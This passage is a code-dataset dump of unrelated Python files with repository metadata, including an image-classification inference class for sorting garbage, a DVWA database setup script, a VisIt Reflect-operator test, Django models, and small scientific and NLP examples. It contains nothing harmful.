            output_score_tensor_name = self.signature[self.signature_key].outputs[self.output_key_1].name
            self.input_images = self.sess.graph.get_tensor_by_name(input_images_tensor_name)
            self.output_score = self.sess.graph.get_tensor_by_name(output_score_tensor_name)

        # Class id (as string) -> human-readable label "category/item".
        self.label_id_name_dict = \
            {
                "0": "其他垃圾/一次性快餐盒",
                "1": "其他垃圾/污损塑料",
                "2": "其他垃圾/烟蒂",
                "3": "其他垃圾/牙签",
                "4": "其他垃圾/破碎花盆及碟碗",
                "5": "其他垃圾/竹筷",
                "6": "厨余垃圾/剩饭剩菜",
                "7": "厨余垃圾/大骨头",
                "8": "厨余垃圾/水果果皮",
                "9": "厨余垃圾/水果果肉",
                "10": "厨余垃圾/茶叶渣",
                "11": "厨余垃圾/菜叶菜根",
                "12": "厨余垃圾/蛋壳",
                "13": "厨余垃圾/鱼骨",
                "14": "可回收物/充电宝",
                "15": "可回收物/包",
                "16": "可回收物/化妆品瓶",
                "17": "可回收物/塑料玩具",
                "18": "可回收物/塑料碗盆",
                "19": "可回收物/塑料衣架",
                "20": "可回收物/快递纸袋",
                "21": "可回收物/插头电线",
                "22": "可回收物/旧衣服",
                "23": "可回收物/易拉罐",
                "24": "可回收物/枕头",
                "25": "可回收物/毛绒玩具",
                "26": "可回收物/洗发水瓶",
                "27": "可回收物/玻璃杯",
                "28": "可回收物/皮鞋",
                "29": "可回收物/砧板",
                "30": "可回收物/纸板箱",
                "31": "可回收物/调料瓶",
                "32": "可回收物/酒瓶",
                "33": "可回收物/金属食品罐",
                "34": "可回收物/锅",
                "35": "可回收物/食用油桶",
                "36": "可回收物/饮料瓶",
                "37": "有害垃圾/干电池",
                "38": "有害垃圾/软膏",
                "39": "有害垃圾/过期药物"
            }

    def addGaussianNoise(self, image, percetage):
        """Overwrite roughly `percetage` of the pixels (one random channel
        each) with Gaussian noise; returns a modified copy."""
        G_Noiseimg = image.copy()
        w = image.shape[1]
        h = image.shape[0]
        G_NoiseNum = int(percetage * image.shape[0] * image.shape[1])
        for i in range(G_NoiseNum):
            temp_x = np.random.randint(0, h)
            temp_y = np.random.randint(0, w)
            G_Noiseimg[temp_x][temp_y][np.random.randint(3)] = np.random.randn(1)[0]
        return G_Noiseimg

    # dimming
    def darker(self, image, percetage=0.9):
        """Scale every channel of every pixel by `percetage` (< 1 dims)."""
        image_copy = image.copy()
        w = image.shape[1]
        h = image.shape[0]
        # get darker
        for xi in range(0, w):
            for xj in range(0, h):
                image_copy[xj, xi, 0] = int(image[xj, xi, 0] * percetage)
                image_copy[xj, xi, 1] = int(image[xj, xi, 1] * percetage)
                image_copy[xj, xi, 2] = int(image[xj, xi, 2] * percetage)
        return image_copy

    def brighter(self, image, percetage=1.5):
        """Scale every channel by `percetage` (> 1 brightens), clipped to [0, 255]."""
        image_copy = image.copy()
        w = image.shape[1]
        h = image.shape[0]
        # get brighter
        for xi in range(0, w):
            for xj in range(0, h):
                image_copy[xj, xi, 0] = np.clip(int(image[xj, xi, 0] * percetage), a_max=255, a_min=0)
                image_copy[xj, xi, 1] = np.clip(int(image[xj, xi, 1] * percetage), a_max=255, a_min=0)
                image_copy[xj, xi, 2] = np.clip(int(image[xj, xi, 2] * percetage), a_max=255, a_min=0)
        return image_copy

    def center_img(self, img, size=None, fill_value=255):
        """
        center img in a square background

        Note: also injects Gaussian noise first, so this doubles as one of
        the TTA variants used by _inference.
        """
        img = self.addGaussianNoise(img, 0.3)
        h, w = img.shape[:2]
        if size is None:
            size = max(h, w)
        shape = (size, size) + img.shape[2:]
        background = np.full(shape, fill_value, np.uint8)
        center_x = (size - w) // 2
        center_y = (size - h) // 2
        background[center_y:center_y + h, center_x:center_x + w] = img
        return background

    def preprocess_img(self, img):
        """
        image preprocessing
        you can add your special preprocess method here
        """
        img = img.resize((int(self.input_size), int(self.input_size)))
        img = img.convert('RGB')
        img = np.array(img)
        img = img[:, :, ::-1]  # RGB -> BGR channel order
        return img

    def _preprocess(self, data):
        # Decode every uploaded file into a preprocessed pixel array.
        preprocessed_data = {}
        for k, v in data.items():
            for file_name, file_content in v.items():
                img = Image.open(file_content)
                img = self.preprocess_img(img)
                preprocessed_data[k] = img
        return preprocessed_data

    def _inference(self, data):
        """
        model inference function
        Here are a inference example of resnet, if you use another model, please modify this function
        """
        img = data[self.input_key_1]
        img1 = self.center_img(img, self.input_size)  # noise + centering variant
        img2 = self.darker(img)
        img3 = self.brighter(img)
        img = img[np.newaxis, :, :, :]  # the input tensor shape of resnet is [?, 224, 224, 3]
        img1 = img1[np.newaxis, :, :, :]
        img2 = img2[np.newaxis, :, :, :]
        img3 = img3[np.newaxis, :, :, :]
        pred_score = self.sess.run([self.output_score], feed_dict={self.input_images: img})
        pred_score1 = self.sess.run([self.output_score], feed_dict={self.input_images: img1})
        pred_score2 = self.sess.run([self.output_score], feed_dict={self.input_images: img2})
        pred_score3 = self.sess.run([self.output_score], feed_dict={self.input_images: img3})
        # Bug fix: sess.run returns a *list* of fetched arrays, so the old
        # `pred_score + pred_score1 + ...` concatenated the four lists and the
        # subsequent argmax(pred_score[0]) only ever used the un-augmented
        # image's scores. Sum the score arrays element-wise instead so all
        # four TTA variants actually vote.
        pred_score = pred_score[0] + pred_score1[0] + pred_score2[0] + pred_score3[0]
        if pred_score is not None:
            pred_label = np.argmax(pred_score, axis=1)[0]
            result = {'result': self.label_id_name_dict[str(pred_label)]}
        else:
            result = {'result': 'predict score is None'}
        return result

    def _postprocess(self, data):
        # _inference already produced the final payload; pass it through.
        return data
40.106145
109
0.528068
2f804b90261ea044b41c8b13aa8defc13023ddb9
791
py
Python
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
4
2019-05-13T21:39:29.000Z
2019-08-10T09:19:44.000Z
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
null
null
null
dvwa-app/victim/dvwa_init.py
alxgrk/pratikum-sec-inf-and-event-mgmt
a53d8a79be4664b7b8b249034760bab1d9fbc657
[ "Apache-2.0" ]
null
null
null
from time import sleep from selenium.webdriver.chrome.options import Options from selenium import webdriver from pyvirtualdisplay import Display import requests import os # dvwa init script - to create the dvwa database requests.packages.urllib3.disable_warnings() # Virtual display to run chrome-browser display = Display(visible=0, size=(800, 800)) display.start() chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--disable-dev-shm-usage') browser = webdriver.Chrome(chrome_options=chrome_options) # create DATABASE ### url = 'http://localhost/setup.php' browser.get(url) browser.find_element_by_name('create_db').click() # shut down browser.quit() display.popen.kill() os._exit(os.EX_OK)
24.71875
57
0.790139
2f8dc9b39b247781ae302d4a2415ef37a9e428aa
7,964
py
Python
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/test/tests/operators/reflect.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
# ---------------------------------------------------------------------------- # CLASSES: nightly # # Test Case: reflect.py # # Tests: mesh - 3D curvilinear, single domain, # 3D rectilinear, single domain. # 3D unstructured, single domain. # plots - pc, vector, subset # # Defect ID: '5079, '5872, '6321 # # Programmer: Hank Childs # Date: June 24, 2004 # # Modifications: # # Hank Childs, Fri Aug 13 09:52:28 PDT 2004 # Test ghost nodes along the reflection plane. # # Hank Childs, Thu Aug 19 16:37:35 PDT 2004 # Do not test ops_refl12 since that is done in reflect2.py (and will be # until SR mode plays well with transparency). # # Jeremy Meredith, Thu Oct 21 11:56:05 PDT 2004 # Reintegrated ops_refl12 since SR/transparency works now. # # Hank Childs, Thu Jan 20 11:31:43 PST 2005 # Test projecting then reflecting ['5872]. # # Hank Childs, Tue Jul 5 09:29:40 PDT 2005 # Test that reflected plots are not degenerate by using the volume plot # ['6321]. # # Jeremy Meredith, Tue Jul 15 10:43:58 EDT 2008 # Changed number of vectors in vector plot to match the old behavior. # (We now account for how many domains there are.) # # Mark C. Miller, Wed Jan 20 07:37:11 PST 2010 # Added ability to swtich between Silo's HDF5 and PDB data. # # Cyrus Harrison, Thu Mar 25 09:57:34 PDT 2010 # Added call(s) to DrawPlots() b/c of changes to the default plot state # behavior when an operator is added. # # Kathleen Biagas, Mon Dec 19 15:45:38 PST 2016 # Use FilledBoundary plot for materials instead of Subset. # # Alister Maguire, Wed Apr 25 15:56:47 PDT 2018 # Added tests for reflecting across an arbitrary plane. # # ---------------------------------------------------------------------------- # 3D, rectilinear. Multi-block Tests ghost zones as well. 
# ops_refl01: 2D rectilinear data with a multi-flag reflection mask.
OpenDatabase(silo_data_path("rect2d.silo"))
atts = ReflectAttributes()
AddPlot("Pseudocolor", "d")
AddOperator("Reflect")
atts.reflections = (1, 0, 1, 0, 0, 0, 0, 0)
SetOperatorOptions(atts)
DrawPlots()
Test("ops_refl01")
DeleteAllPlots()

# ops_refl02: reflect Mesh + FilledBoundary together across user-specified
# (non-boundary) reflection coordinates.
AddPlot("Mesh", "quadmesh2d")
AddPlot("FilledBoundary", "mat1")
SetActivePlots((0,1))
AddOperator("Reflect")
DrawPlots()
atts.reflections = (0, 1, 1, 1, 0, 0, 0, 0)
atts.useXBoundary = 0
atts.specifiedX = -0.1
atts.useYBoundary = 0
atts.specifiedY = -0.05
SetOperatorOptions(atts)
Test("ops_refl02")
DeleteAllPlots()

# ops_refl03/04: curvilinear data, with and without an Isosurface on top.
OpenDatabase(silo_data_path("curv2d.silo"))
AddPlot("Pseudocolor", "d")
AddOperator("Reflect")
DrawPlots()
Test("ops_refl03")
AddOperator("Isosurface")
DrawPlots()
Test("ops_refl04")

# Move the isosurface operator before the reflect. This tests whether
# or not we can reflect polydata.
PromoteOperator(0)
DrawPlots()
Test("ops_refl05")
DeleteAllPlots()

# Test unstructured mesh -- plus test vectors.
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Vector", "vel")
v = VectorAttributes()
v.vectorOrigin = v.Head
v.nVectors = 400*4
SetPlotOptions(v)
AddOperator("Reflect")
atts.reflections = (1, 0, 1, 0, 1, 0, 0, 1)
atts.useXBoundary = 1
atts.useYBoundary = 1
SetOperatorOptions(atts)
DrawPlots()
v = GetView3D()
v.viewNormal = (-0.324974, 0.839345, 0.435765)
v.focus = (-10, -10, -10)
v.viewUp = (-0.252067, 0.367233, -0.895322)
v.viewAngle = 30
v.parallelScale = 34.641
v.nearPlane = -69.282
v.farPlane = 69.282
v.imagePan = (0, 0)
v.imageZoom = 1.56244
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0, 0, 0)
SetView3D(v)
Test("ops_refl06")

# Now test a zonal vector variable (different code in the reflect operator).
ChangeActivePlotsVar("disp")
Test("ops_refl07")

# ops_refl08/09: interaction of Reflect with the Displace operator, in both
# operator orders.
disp_atts = DisplaceAttributes()
disp_atts.variable = "vel"
SetDefaultOperatorOptions(disp_atts)
AddOperator("Displace")
DrawPlots()
Test("ops_refl08")
PromoteOperator(0)
disp_atts.variable = "disp"
disp_atts.factor = 4
SetOperatorOptions(disp_atts)
ChangeActivePlotsVar("vel")
DrawPlots()
Test("ops_refl09")
DeleteAllPlots()

# Test that we properly put ghost nodes along the reflection plane.
# There is a lot of code dedicated to creating the ghost nodes for a
# rectilinear grid. Use the PXPYPZ and NXNYNZ octants to flex all of that
# code.
OpenDatabase(silo_data_path("noise.silo"))
AddPlot("Pseudocolor", "hardyglobal")
pc = PseudocolorAttributes()
pc.SetOpacityType(pc.Constant)
pc.opacity = 0.3
SetPlotOptions(pc)
AddOperator("Reflect")
r = ReflectAttributes()
r.reflections = (1,1,1,1,1,1,1,1)
SetOperatorOptions(r)
DrawPlots()
v = GetView3D()
v.viewNormal = (-0.390471, 0.546441, 0.740901)
v.focus = (-10, -10, -10)
v.viewUp = (0.00925777, 0.807079, -0.590371)
v.viewAngle = 30
v.parallelScale = 34.641
v.nearPlane = -69.282
v.farPlane = 69.282
v.imagePan = (0, 0)
v.imageZoom = 1
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0, 0, 0)
SetView3D(v)
Test("ops_refl10")

# Same dataset from the opposite octant.
r.octant = r.NXNYNZ
SetOperatorOptions(r)
v.viewNormal = (0.576101, 0.343493, 0.741701)
v.focus = (10, 10, 10)
v.viewUp = (-0.15522, 0.936877, -0.313318)
SetView3D(v)
Test("ops_refl11")

# Now make sure that this works well with an everyday vtkPointSet as well.
# Also test that we can handle the presence of both ghost nodes (from the
# reflect) and ghost zones (from the multi_ucd3d file).
DeleteAllPlots()
OpenDatabase(silo_data_path("multi_ucd3d.silo"))
AddPlot("Pseudocolor", "d")
SetPlotOptions(pc)
AddOperator("Reflect")
r = ReflectAttributes()
r.reflections = (1,0,0,0,1,0,0,0)
SetOperatorOptions(r)
DrawPlots()
v.viewNormal = (0.328912, 0.896692, 0.296244)
v.focus = (0, 2.5, 20)
v.viewUp = (-0.710536, 0.441617, -0.547826)
v.viewAngle = 30
v.parallelScale = 20.7666
v.nearPlane = -41.5331
v.farPlane = 41.5331
v.imagePan = (-0.237006, -0.229008)
v.imageZoom = 1.25605
v.perspective = 1
v.eyeAngle = 2
v.centerOfRotationSet = 0
v.centerOfRotation = (0, 0, 0)
SetView3D(v)
Test("ops_refl12")
DeleteAllPlots()

# ops_refl13: project-then-reflect regression test ('5872).
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Boundary", "mat1")
AddOperator("Project")
AddOperator("Reflect")
DrawPlots()
Test("ops_refl13")

# The "mass volume extractor" of the volume renderer depends on the
# rectilinear grid not being inverted. Test that here ('6321).
DeleteAllPlots()
OpenDatabase(silo_data_path("rect3d.silo"))
AddPlot("Volume", "d")
AddOperator("Reflect")
DrawPlots()
Test("ops_refl14")

#
# Now test reflecting different datasets over arbitrary planes.
#
# Test 3D rectilinear over arbitrary plane.
DeleteAllPlots()
OpenDatabase(silo_data_path("multi_rect3d.silo"))
AddPlot("Pseudocolor" ,"d")
AddOperator("Reflect")
atts = ReflectAttributes()
atts.reflectType = atts.Plane
atts.planePoint = (1, 1, 1)
atts.planeNormal = (4, 5, 6)
SetOperatorOptions(atts)
DrawPlots()
Test("arb_plane00")

# Test 3D curvilinear over arbitrary plane.
DeleteAllPlots()
ResetView()
OpenDatabase(silo_data_path("curv3d.silo"))
AddPlot("Pseudocolor" ,"v")
AddOperator("Reflect")
atts = ReflectAttributes()
atts.reflectType = atts.Plane
atts.planePoint = (-8, -3, -4)
atts.planeNormal = (4.5, 3, 2)
SetOperatorOptions(atts)
DrawPlots()
Test("arb_plane01")

# Test 2D curvilinear
DeleteAllPlots()
OpenDatabase(silo_data_path("curv2d.silo"))
AddPlot("Pseudocolor" ,"v")
AddOperator("Reflect")
atts = ReflectAttributes()
atts.reflectType = atts.Plane
atts.planePoint = (-8, -3, 0)
atts.planeNormal = (4.5, 3, 0)
SetOperatorOptions(atts)
DrawPlots()
Test("arb_plane02")

# Test 3D unstructured
DeleteAllPlots()
OpenDatabase(silo_data_path("globe.silo"))
AddPlot("Pseudocolor" ,"v")
AddOperator("Reflect")
atts = ReflectAttributes()
atts.reflectType = atts.Plane
atts.planePoint = (-8, -3, 0)
atts.planeNormal = (7, 9, 1)
SetOperatorOptions(atts)
DrawPlots()
Test("arb_plane03")

# arb_plane04: two stacked Reflect operators over different planes.
AddOperator("Reflect")
atts = ReflectAttributes()
atts.reflectType = atts.Plane
atts.planePoint = (20, 15, 19)
atts.planeNormal = (3, 2, 4)
SetOperatorOptions(atts)
DrawPlots()
Test("arb_plane04")

Exit()
23.218659
78
0.701783
85ecb0843554ba21bdfb959674c3a245209a1a46
936
py
Python
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
gratz/forum/models.py
mike-carter/Gratz
5f0889c4ad127e2bb513f11cb4b39e9a3aa2d4c6
[ "MIT" ]
null
null
null
from django.db import models from django.contrib.auth.models import User from django.urls import reverse # Create your models here. class Post(models.Model): owner = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) title = models.CharField(max_length=200) date_posted = models.DateTimeField('date posted') text = models.TextField(null=True) def get_post_summary(self): summary = self.text[:141] if len(self.text) > 140: summary += '...' return summary def get_absolute_url(self): return reverse('forum:post_detail', kwargs={'pk': self.pk}) def __str__(self): return self.title class Comment(models.Model): post = models.ForeignKey(Post, on_delete=models.CASCADE) owner = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) date_posted = models.DateTimeField('date posted') text = models.TextField(null=True)
28.363636
73
0.692308
7b362861b251d9ca35fbc4b47058e09adae518d8
430
py
Python
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
2,085
2019-04-17T13:10:40.000Z
2022-03-30T21:51:46.000Z
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
79
2019-04-18T14:42:55.000Z
2022-03-07T08:15:43.000Z
exercises/es/solution_01_03_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
361
2019-04-17T13:34:32.000Z
2022-03-28T04:42:45.000Z
# Importa la clase de lenguaje "Spanish" y crea el objeto nlp from spacy.lang.es import Spanish nlp = Spanish() # Procesa el texto doc = nlp("Me gustan las panteras negras y los leones.") # Un slice del Doc para "panteras negras" panteras_negras = doc[3:5] print(panteras_negras.text) # Un slice del Doc para "panteras negras y los leones" (sin el ".") panteras_negras_y_leones = doc[3:8] print(panteras_negras_y_leones.text)
26.875
67
0.751163
cda61c3e1040bdcce1d3d3b499178b6b51b69299
410
py
Python
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
src/pgsql_cluster.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
#!/usr/bin/python # pylint: disable=W0142 ''' Postgresql script for ztc (pgsql.* items) Copyright (c) 2009-2011 Vladimir Rusinov <[email protected]> Licensed under GNU GPL v.3 Currently supported metrics: * autovac_freeze (float) - returns max % of how close each database to autovac_freeze ''' from ztc.pgsql.pgcluster import PgCluster p = PgCluster() m = p.args[0] p.get(m, *p.args[1:])
22.777778
74
0.714634
cde4c068e03549736e09b71a3003913bfd1f84c3
619
py
Python
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
quark_core_api/common/object_initializers.py
arcticle/Quark
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
[ "MIT" ]
null
null
null
APPLICATION = { "workspaces" : [{"id":1, "name":"WS-1", "dir":"d:/quark/WS-1"}, {"id":2, "name":"WS-2", "dir":"d:/quark/WS-2"}, {"id":3, "name":"WS-3", "dir":"d:/quark/WS-3"}], "user": { "name" : "John Doe", "email" : "[email protected]" }, "repo_limit" : 10, "tags" : [ "Data Analytics 101", "Artificial Intelligence", "Arcticle", "Quark" ], "scores" : [100, 200, 300, 400] } WORKSPACE = { "scripts" : [], "experiments" : [] } EXPERIMENT = { "pipeline" : [], "params" : {} }
17.685714
68
0.408724
a83765db97f22b3b2f20187788369f18856e68f4
1,139
py
Python
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
6
2018-06-27T00:09:55.000Z
2019-03-07T14:06:53.000Z
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
3
2021-03-31T18:37:46.000Z
2021-06-01T21:49:41.000Z
etl/transforms/primitives/df/tests/test_format_data.py
cloud-cds/cds-stack
d68a1654d4f604369a071f784cdb5c42fc855d6e
[ "Apache-2.0" ]
3
2020-01-24T16:40:49.000Z
2021-09-30T02:28:55.000Z
from etl.transforms.primitives.df import format_data from etl.core import test_utils import pytest import pandas as pd import numpy as np def test_format_columns(): df = pd.DataFrame([ { 'admittime': '5:43pm March 6th, 2012', 'age': 123, }, { 'admittime': '17:43 2012/3/6', 'age': 12.30, }, { 'admittime': '03-06-2012 5:43:00PM', 'age': '12', } ]) result = format_data.format_tsp(df, 'admittime') result = format_data.format_numeric(df, 'age') assert set(result.admittime) == set(['2012-03-06 17:43:00 EST']) assert list(result.age) == [123.0, 12.3, 12.0] @pytest.mark.parametrize('value, is_empty', [ ('', True), (' ', True), (' ', True), ("", True), (" ", True), (None, True), (np.nan, True), (0, False), ("abc", False), (123, False), (123.02, False), ]) def test_filter_out_empty(value, is_empty): df = pd.DataFrame([{'A': value, 'B': 'extra'}]) result = format_data.filter_empty_values(df.copy(), 'A') if is_empty: assert result.empty else: assert not result.empty
22.78
66
0.565408
8d0fc53c3e9dc97a8f7f4d71dcfa1ffec1d144b4
1,986
py
Python
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
4
2017-06-20T19:56:22.000Z
2021-05-29T10:07:47.000Z
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
11
2017-05-31T19:14:32.000Z
2018-09-12T23:44:11.000Z
imageDelta/experiment-epi-NaCl.py
swharden/ROI-Analysis-Pipeline
e83d96c43fdd50cb44be365289e964576492617e
[ "MIT" ]
2
2017-06-20T17:14:38.000Z
2017-06-20T19:51:34.000Z
""" Code in this file aims to automatically produce "difference images" from full frame micrographs of calcium-sensitive fluorophores before and after a drug is applied. This is done by creating a baseline image (the average of several TIFs before the drug) and calculating the difference between that and the average image of the drug exposure. The difference is color-coded where no change is white, decrease in brightness is blue, an dincrease in brightness is red. """ import os import imageDelta as id if __name__ == "__main__": ### CUSTOM ANALYSIS ### # This sample analysis routine analyzes all experiments where drugs were applied at the same time. # To create a new experiment, re-write this portion of the code. # given a list of experiment folders, analyze only those with NaCl in the filename folderRoot = R"X:\Data\AT1-Cre\MPO GCaMP6f\data\data-epi" folders = sorted(os.listdir(folderRoot)) folders = [x for x in folders if "-NaCl" in x] folders = [os.path.join(folderRoot, x) for x in folders] # ensure experiment folders contain properly-formatted filenames for folder in folders: folderPath = os.path.join(folder,"video") id.ensureImageFilenamesAreNumbers(folderPath) # analyze each experiment folder for folder in folders: if os.path.exists(folder+"/analysis_01_intensityOverTime.png"): print("Skipping already-analyzed folder:", os.path.basename(folder)) continue folderPath = os.path.join(folder,"video") if not os.path.exists(folderPath): print("Skipping path without a video folder:", os.path.basename(folder)) continue print(f"\n\nANALYZING: {folderPath}") drugs = [] drugs.append(id.Drug("NaCl", id.drugFrameFromFileList(10, folderPath))) drugs.append(id.Drug("AngII", id.drugFrameFromFileList(20, folderPath))) id.graphDrugExperiment(drugs, folderPath) print("DONE")
44.133333
102
0.704935
5705496f01ae32cfe1686c1207fb649cb14c3efc
1,434
py
Python
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
226
2018-12-29T01:13:49.000Z
2022-03-30T19:16:31.000Z
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
5,100
2019-01-14T18:19:25.000Z
2022-03-31T23:08:36.000Z
src/doc/data_into_visit/data_examples/blueprint_example.py
visit-dav/vis
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
[ "BSD-3-Clause" ]
84
2019-01-24T17:41:50.000Z
2022-03-10T10:01:46.000Z
import sys sys.path.append("/usr/gapps/conduit/software/ascent/0.7.1/toss_3_x86_64_ib/openmp/gnu/conduit-install/lib/python3.7/site-packages") import conduit import conduit.relay.io import conduit.blueprint.mesh import numpy mesh = conduit.Node() # Create the coordinate set. mesh["coordsets/coords/type"] = "uniform" mesh["coordsets/coords/dims/i"] = 3 mesh["coordsets/coords/dims/j"] = 3 mesh["coordsets/coords/origin/x"] = -10.0 mesh["coordsets/coords/origin/y"] = -10.0 mesh["coordsets/coords/spacing/dx"] = 10.0 mesh["coordsets/coords/spacing/dy"] = 10.0 # Add the topology. mesh["topologies/topo/type"] = "uniform" mesh["topologies/topo/coordset"] = "coords" # Add a simple element-associated field. mesh["fields/ele_example/association"] = "element" mesh["fields/ele_example/topology"] = "topo" edata = numpy.array([1, 2, 3, 4], dtype=numpy.float64) mesh["fields/ele_example/values"] = edata # Add a simple vertex-associated field. mesh["fields/vert_example/association"] = "vertex" mesh["fields/vert_example/topology"] = "topo" vdata = numpy.array([1, 1, 1, 2, 2, 2, 3, 3, 3], dtype=numpy.float64) mesh["fields/vert_example/values"] = vdata # Verify that the mesh conforms to the specification. verify_info = conduit.Node() if not conduit.blueprint.mesh.verify(mesh, verify_info): print("Verify failed") print(verify_info) print(mesh) conduit.relay.io.blueprint.write_mesh(mesh, "blueprint_example", "json")
31.173913
131
0.738494
57515b3f6fac81f089ab42897f38a8955772ed34
38
py
Python
sentinel/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
342
2017-08-21T20:12:56.000Z
2022-03-19T17:58:25.000Z
sentinel/__init__.py
allagog0x01/sentwg
52285ecf2b03c30a78901a29a7af96c8ab5764c8
[ "Apache-2.0" ]
57
2017-11-13T11:16:47.000Z
2022-03-01T13:54:31.000Z
vpn-node-cosmos/sentinel/__init__.py
smtcrms/sentinel
ff65bc9200f6c940aa184c0ec0872fdcfef25363
[ "MIT" ]
72
2017-11-23T05:13:24.000Z
2022-02-25T14:18:33.000Z
# coding=utf-8 from .node import node
12.666667
22
0.736842
5ff5c14b8287d95cc19e53bc26fd2e6fd47f2754
2,023
py
Python
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
1,107
2016-09-21T02:18:36.000Z
2022-03-29T02:52:12.000Z
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
18
2016-12-22T10:24:47.000Z
2022-03-11T23:18:43.000Z
_Dist/NeuralNetworks/c_BasicNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
776
2016-12-21T12:08:08.000Z
2022-03-21T06:12:08.000Z
import os import sys root_path = os.path.abspath("../../../") if root_path not in sys.path: sys.path.append(root_path) from _Dist.NeuralNetworks.NNUtil import * from _Dist.NeuralNetworks.DistBase import Base class Basic(Base): signature = "Basic" def __init__(self, *args, **kwargs): super(Basic, self).__init__(*args, **kwargs) self._name_appendix = "BasicNN" self.activations = self.hidden_units = None @property def name(self): return "NN" if self._name is None else self._name def init_model_param_settings(self): super(Basic, self).init_model_param_settings() self.activations = self.model_param_settings.get("activations", "relu") def init_model_structure_settings(self): super(Basic, self).init_model_structure_settings() self.hidden_units = self.model_structure_settings.get("hidden_units", [256, 256]) def _build_layer(self, i, net): activation = self.activations[i] if activation is not None: net = getattr(Activations, activation)(net, "{}{}".format(activation, i)) return net def _build_model(self, net=None): self._model_built = True if net is None: net = self._tfx current_dimension = net.shape[1].value if self.activations is None: self.activations = [None] * len(self.hidden_units) elif isinstance(self.activations, str): self.activations = [self.activations] * len(self.hidden_units) else: self.activations = self.activations for i, n_unit in enumerate(self.hidden_units): net = self._fully_connected_linear(net, [current_dimension, n_unit], i) net = self._build_layer(i, net) current_dimension = n_unit appendix = "_final_projection" fc_shape = self.hidden_units[-1] if self.hidden_units else current_dimension self._output = self._fully_connected_linear(net, [fc_shape, self.n_class], appendix)
36.781818
92
0.660405
7bffbb2958f7221f1f5a0f33b82cc40d76056662
1,333
py
Python
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
9
2018-09-01T06:34:52.000Z
2020-11-02T22:53:58.000Z
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
sFTP-master/crypto.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
5
2018-11-29T20:09:20.000Z
2020-11-02T22:54:00.000Z
